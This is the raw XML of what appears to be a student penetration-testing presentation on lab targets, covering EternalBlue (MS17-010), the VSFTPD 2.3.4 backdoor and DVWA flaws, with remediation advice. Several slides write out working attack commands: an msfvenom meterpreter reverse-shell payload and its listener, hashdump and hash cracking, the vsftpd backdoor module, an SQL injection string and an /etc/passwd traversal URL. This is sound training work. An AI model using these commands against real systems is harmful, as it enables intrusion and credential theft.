              <a:lnSpc>
                <a:spcPct val="100000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IN" sz="1400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>What is penetration testing, and why is it important to perform it on an organization’s network?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial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285750"/>
            <a:ext cx="8686800" cy="43223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br>
              <a:rPr lang="en-IN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Part-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sz="2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sz="2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b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 Process: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Network Scanning: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Nmap used to discover live systems and services on the network.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Vulnerability Scanning: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Use Metasploit to perform a detailed vulnerability scan on the target system.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>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>     Identify 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weaknesses, specifically the SMB vulnerability (MS17-010), which is exploitable using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EternalBlue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 Exploiting the Vulnerability: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Exploit the MS17-010 (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EternalBlue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vulnerability using Metasploit to gain unauthorized access to the system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Use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msfvenom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a malicious payload and send it to the target system to gain a reverse shell.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 Session Persistence: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Configure Meterpreter to maintain access and ensure persistence even after the machine is rebooted.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5800" y="196088"/>
            <a:ext cx="7478801" cy="875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b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 Identified for Zero Bank</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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9ED6DA-E30D-4159-DE0F-F32756632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-138499"/>
            <a:ext cx="7010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EDB6A-8BDC-A004-A272-5A2AE349AB0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="100933"/>
            <a:ext cx="7543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Vulnerability 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SMB Vulnerability (MS17-010)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Overview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Enables remote code execution via the SMB protocol on port 445.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Exploitation Method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Can be exploited using the EternalBlue exploit.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Consequences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Attackers may gain unauthorized access to the target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57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1" y="514350"/>
            <a:ext cx="8077200" cy="3953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 rtl="0"/>
            <a:r>
              <a:rPr lang="en-IN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Nmap:</a:t>
            </a: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Nmap is a network scanning tool used to discover live systems, open ports, and services running on the network.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MSFvenom:</a:t>
            </a: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MSFvenom is a tool used to generate custom malware payloads for exploitation. In this project, it created a payload to deliver a reverse shell for remote access to the target machine.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HTTP Server</a:t>
            </a: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a simple HTTP server to serve the generated payload for download on the target machine.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Metasploit Framework:</a:t>
            </a:r>
            <a:b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to establish a listener for the reverse shell initiated by the payload, allowing for post-exploitation actions and access to the target system.</a:t>
            </a:r>
            <a:b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b="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7" y="196088"/>
            <a:ext cx="4136644" cy="37991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IN" sz="14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IN" sz="14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</a:t>
            </a:r>
            <a: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–p 445 192.168.137.67</a:t>
            </a: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msfvenom</a:t>
            </a:r>
            <a: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–p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="14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meterpreter</a:t>
            </a:r>
            <a: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14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reverse_tcp</a:t>
            </a:r>
            <a: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LHOST 192.168.137.10 LPORT 4448 –f exe &gt; malware.exe</a:t>
            </a:r>
            <a:b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creation of a malicious payload that will be used for exploitation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8625A-80E9-1BE3-2532-8FE9EB0A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98095"/>
            <a:ext cx="3222244" cy="1759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C0043-6F5E-3841-E385-DD6890E33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03"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4571999" y="2571750"/>
            <a:ext cx="4289043" cy="24212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6443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1860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400" b="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use exploit/multi/handler</a:t>
            </a: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 payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="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meterpreter</a:t>
            </a:r>
            <a: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sz="1400" b="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reverse_tcp</a:t>
            </a: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 LHOST 192.168.137.10</a:t>
            </a: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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="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Lport</a:t>
            </a:r>
            <a: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4448</a:t>
            </a:r>
            <a:b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exploit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D8F06-06B8-8715-7737-ADC6D84F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85950"/>
            <a:ext cx="6001662" cy="1919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0B3BC-DC61-77E3-BE45-28554536A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019550"/>
            <a:ext cx="6001662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7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367600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4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sysinfo</a:t>
            </a:r>
            <a:b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IN" sz="1400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hashdump</a:t>
            </a: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–format=NT hashes.txt</a:t>
            </a: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b="0" spc="-2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05ACAB-E473-EAEC-B210-C25490EAF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40" y="971550"/>
            <a:ext cx="6654960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840D6-97E0-150C-4769-3CCB4924BD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36"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1955640" y="3804412"/>
            <a:ext cx="6107201" cy="1053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1622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94CF5A-A6F9-62B4-F61E-8AF3808E3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641114"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="282954" y="895351"/>
          <a:ext cx="8059577" cy="2590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1846">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="357744353"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4227731">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1255425785"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="450574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 Term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 Term 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003261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r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                        <a:t>Patch SMB Vulnerabilities:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Apply MS17-010 update to fix SMB issues and prevent </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
                        <a:t>EternalBlue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> attacks.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Limit System Access:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Use network segmentation to secure sensitive systems.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945344"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="563217">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                        <a:t>Disable SMBv1:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Turn off outdated and vulnerable SMBv1 on all Windows systems.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Restrict SMB Traffic:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Deploy firewalls to allow only essential SMB services.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645795"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788504">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                        <a:t>Use IDS:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Install intrusion detection systems (IDS) to monitor for suspicious activity.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Regular Scans:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t> Perform vulnerability scans regularly to identify and fix issues.</a:t>
                      </a:r>
                      <a:endParaRPr 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235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536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0876" y="2272995"/>
            <a:ext cx="72663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VSFTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="36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355" y="853516"/>
            <a:ext cx="8049895" cy="45044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buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"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  <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l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a comprehensive security assessment of VSFTPD and DVWA to enhance their security posture.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Activities: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 service discovery to identify open ports and running services on the target systems.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  <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLst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vulnerability scans to detect weaknesses in the applications.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  <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLst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Exploit vulnerabilities in DVWA, focusing on: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Cross-Site Scripting (XSS)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SQL injection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Directory traversal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  <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" alt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spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLs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 the security of VSFTPD to identify potential backdoor vulnerabilities and other risks.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  <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLs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buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="297180" algn="l"/>
              </a:tabLst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433837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="63881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95"/>
              </a:spcBef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Part-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VSFTP</a:t>
            </a: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212790"/>
            <a:ext cx="8077200" cy="4297714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="80390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Identified for VSFTPD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VSFTPD version 2.3.4 has a critical backdoor that enables attackers to gain unauthorized access and establish a root shell on the target system, compromising its security.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Successful exploitation can lead to complete control over the affected system, allowing attackers to execute commands, access sensitive data, and manipulate system settings.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Upgrade to a secure version of VSFTPD to eliminate the backdoor and enhance overall security.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772D837-60B2-7522-05B4-9C578E12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2621FE1F-D70A-16CC-0CE1-D9BB04CD5219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4121150" cy="5143500"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4121150" cy="5143500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3AE80BCC-8971-4759-383E-CF723CA610F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="4121150" cy="5143500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4121150" h="5143500">
                  <a:moveTo>
                    <a:pt x="412076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120769" y="5143500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4120769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F99BDA95-96AE-963E-7AC8-7567F159BB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724" y="998791"/>
              <a:ext cx="3349371" cy="3145917"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49401AB2-BDD4-C8E1-132B-C0C8C80AEC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419474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="110617" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4056379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>What is VAPT</a:t>
            </a:r>
            <a:endParaRPr sz="2000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A604E6-1B5F-AE64-01C7-04F5BB123B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362069" y="856614"/>
            <a:ext cx="4258310" cy="20165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just">
              <a:lnSpc>
                <a:spcPct val="100000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Assessment and Penetration Testing (VAPT) is a procedure used to identify and exploit security weaknesses in a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12065" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000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 algn="just">
              <a:lnSpc>
                <a:spcPct val="100000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Vulnerability Assessment helps to identify known security flaws. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12065" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000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 algn="just">
              <a:lnSpc>
                <a:spcPct val="100000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Testing is used to exploit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those weaknesses.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 algn="just">
              <a:lnSpc>
                <a:spcPct val="100000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endParaRPr sz="14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1541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6575" y="853516"/>
            <a:ext cx="7881645" cy="20140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95325" lvl="1" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="695325" algn="l"/>
              </a:tabLst>
            </a:pP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0210" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="695325" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-I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5325" lvl="1" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="695325" algn="l"/>
              </a:tabLst>
            </a:pP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5325" lvl="1" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="695325" algn="l"/>
              </a:tabLst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Nmap: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scanning the network to identify open ports and detect the service and its version.  </a:t>
            </a:r>
            <a:endParaRPr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5325" lvl="1" indent="-285115">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="695325" algn="l"/>
              </a:tabLs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Exploit module:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1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exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="140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unix</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="14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/ftp/vsftpd_234_backdoor was loaded and execute to gain root access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5325" lvl="1" indent="-285115">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="695325" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-I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Metasploit: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to search and exploit the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vsftpd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backdoor vulnerability.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1373837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="8039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5"/>
              </a:spcBef>
            </a:pP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35965" y="853516"/>
            <a:ext cx="7247890" cy="10906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endParaRPr lang="en-IN" spc="-10" dirty="0"/>
          </a:p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endParaRPr lang="en-IN" spc="-10" dirty="0"/>
          </a:p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endParaRPr lang="en-IN" spc="-10" dirty="0"/>
          </a:p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IN" spc="-10" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t> –p 21 192.168.137.20</a:t>
            </a:r>
          </a:p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IN" spc="-10" dirty="0"/>
              <a:t> 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361950"/>
            <a:ext cx="7881645" cy="16139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>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t>Evidence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-1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707A7-C045-85B6-2AE0-4EF9C349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5" y="1966096"/>
            <a:ext cx="7412635" cy="19836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35965" y="853516"/>
            <a:ext cx="7247890" cy="13086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IN" spc="-10" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" spc="-10" dirty="0"/>
          </a:p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IN" spc="-10" dirty="0"/>
              <a:t>Search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" spc="-10" dirty="0"/>
          </a:p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IN" spc="-10" dirty="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t>/ftp/vsftpd_234_backdoor</a:t>
            </a:r>
          </a:p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IN" spc="-10" dirty="0"/>
              <a:t>set RHOSTS 192.168.137.20</a:t>
            </a:r>
          </a:p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IN" spc="-10" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1639"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t> 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>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
              <a:t>Evidence</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" spc="-10" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-1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8EA4F-7138-F3B5-718C-D39DF4500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6" y="2014415"/>
            <a:ext cx="4761922" cy="1308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020D9-2257-51F8-9821-914C12AC1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89" y="2028900"/>
            <a:ext cx="3815252" cy="2390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3687BE-7CC2-E7C4-E10C-7223F4FF2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0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282956" y="3948171"/>
            <a:ext cx="4724400" cy="94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D72905-C4FA-4266-F67D-07AEF43AD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31" b="91537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282955" y="3440248"/>
            <a:ext cx="4724401" cy="3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92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C4E36-6B38-3CB1-8677-5960D682F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65" y="1047750"/>
            <a:ext cx="7641236" cy="2369880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Cross-Site Scripting (XSS) Vulnerabilities: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Reflected XSS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Attackers can inject malicious scripts through user inputs, leading to session                                       hijacking or data theft.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Stored XSS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Malicious scripts stored in the application database whenever the data is viewed, affecting multiple users.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I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65B580-C065-A4EF-0058-ACAEB786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1080262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Identified for DVWA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005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9C4E36-6B38-3CB1-8677-5960D682F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276350"/>
            <a:ext cx="7881645" cy="2800767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SQL Injection Vulnerabilities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SQL Injection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Allows attackers to manipulate database queries to extract or modify sensitive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Blind SQL Injection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Attackers infer information based on the application’s responses, even without  direct feedback from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Directory Traversal Vulnerabilities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Directory Traversal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Enables attackers to access restricted files by exploiting input validation flaws, leading to unauthorized file access.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65B580-C065-A4EF-0058-ACAEB7869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90551"/>
            <a:ext cx="7957845" cy="3657599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Identified for DVWA</a:t>
            </a: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4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80C7FB-1DF7-7955-74CD-91012C55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5750"/>
            <a:ext cx="7881645" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Tools Used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C4BFF3B-36D8-BC45-FDEE-9B26ADFD9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12289"/>
            <a:ext cx="8098435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Kali Linux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Linux distribution specifically designed for penetration testing and security assessments, providing a wide range of tools for vulnerability discovery and exploitation.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Metasploitable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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/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machine purposely set up with security flaws. It’s used for practicing penetration testing techniques and understanding different vulnerabilities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SQLMap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automated tool for detecting and exploiting SQL injection vulnerabilities, allowing for database enumeration and exploitation.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Metasploit Framework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penetration testing framework that provides a suite of tools for exploiting known vulnerabilities, including support for various exploits against web applications.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network scanning tool used to discover live hosts, open ports, and services running on the target systems,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aiding in vulnerability assessment.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Browsers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Used for manual testing of web applications, allowing for interaction with DVWA and observation of vulnerabilities like XSS and directory traversal through direct user input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95757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F5E4-919C-5FA3-12F4-65FA9815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30887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C68F9-D813-2C9A-D46E-70ED92518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0" r="6020"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1581150"/>
            <a:ext cx="4126001" cy="291373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E12969CA-A014-D5B7-CAC1-78985E635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565487"/>
            <a:ext cx="532709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Performing SQL Injection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exploiting the vulnerability in the login form using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1' OR '1'='1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DF940-0FB0-496C-78F9-E7BC90CB9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81150"/>
            <a:ext cx="4038600" cy="29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56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F5E4-919C-5FA3-12F4-65FA9815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30887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12969CA-A014-D5B7-CAC1-78985E635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842486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b="1" dirty="0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4863C-3403-3E97-3F0B-FD269DBCE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88" r="83538" b="22850"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="718131" y="1152640"/>
            <a:ext cx="1496059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2E4C5-1172-DA31-13F0-9AA26E4C7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3" r="68942" b="16106"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2317793"/>
            <a:ext cx="2748580" cy="198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2DC302-C9D5-7B48-248A-17492773B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196462"/>
            <a:ext cx="5486400" cy="27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3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F5E4-919C-5FA3-12F4-65FA9815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0011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5DED-6EF2-D32A-6A6D-40553F92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65" y="1276350"/>
            <a:ext cx="4212235" cy="1292662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http://&lt;vulnerable-app-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&gt;/app/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index.php?file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=../../etc/passwd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demonstrates the successful exploitation of a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directory traversal vulnerability or shows how the application blocks such access.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361AD-6EC4-D25D-DB2C-3E423F9DE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00150"/>
            <a:ext cx="435648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99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DF5E4-919C-5FA3-12F4-65FA9815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30887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800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5DED-6EF2-D32A-6A6D-40553F92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65" y="971550"/>
            <a:ext cx="7728636" cy="215444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F6C0D0-0A00-12E9-2C53-89D2940C8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478977"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="435964" y="971550"/>
          <a:ext cx="8403237" cy="2503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1079">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1653635302"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2801079">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2697839086"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2801079">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1397798244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Vulnerability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Short-Term Recommendations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Long-Term Recommendations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7657161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Cross-Site Scripting (XSS)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input validation and output encoding.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Regularly update security policies and perform code reviews.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02626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 Injection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Sanitize user inputs and use prepared statements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Conduct regular security training for developers.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924245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r>
                        <a:rPr lang="en-I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Directory Traversal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Restrict file access and validate user inputs.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a Web Application Firewall (WAF) for added protection.</a:t>
                      </a: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57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732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19802" y="0"/>
            <a:ext cx="4121150" cy="5143500"/>
            <a:chOff x="5019802" y="0"/>
            <a:chExt cx="4121150" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5019802" y="0"/>
              <a:ext cx="4121150" cy="5143500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4121150" h="5143500">
                  <a:moveTo>
                    <a:pt x="412076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120769" y="5143500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4120769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2606" y="1575942"/>
              <a:ext cx="3941317" cy="182168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477950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="10756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Pentesting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Project?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768" y="756410"/>
            <a:ext cx="4702809" cy="254364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Phases</a:t>
            </a:r>
            <a:r>
              <a:rPr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penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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testing: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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1205"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst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n-IN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Define goals, target systems, and boundaries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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst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Reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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ollect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about the target system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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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IN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System weaknesses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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst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Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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Attempt to exploit vulnerabilities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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst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lang="en-IN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Record the findings and impacts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6865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzPct val="117857"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="329565" algn="l"/>
              </a:tabLst>
            </a:pP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Remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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Suggest solutions to fix issues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6215" y="2272995"/>
            <a:ext cx="21329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Mutillidae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196088"/>
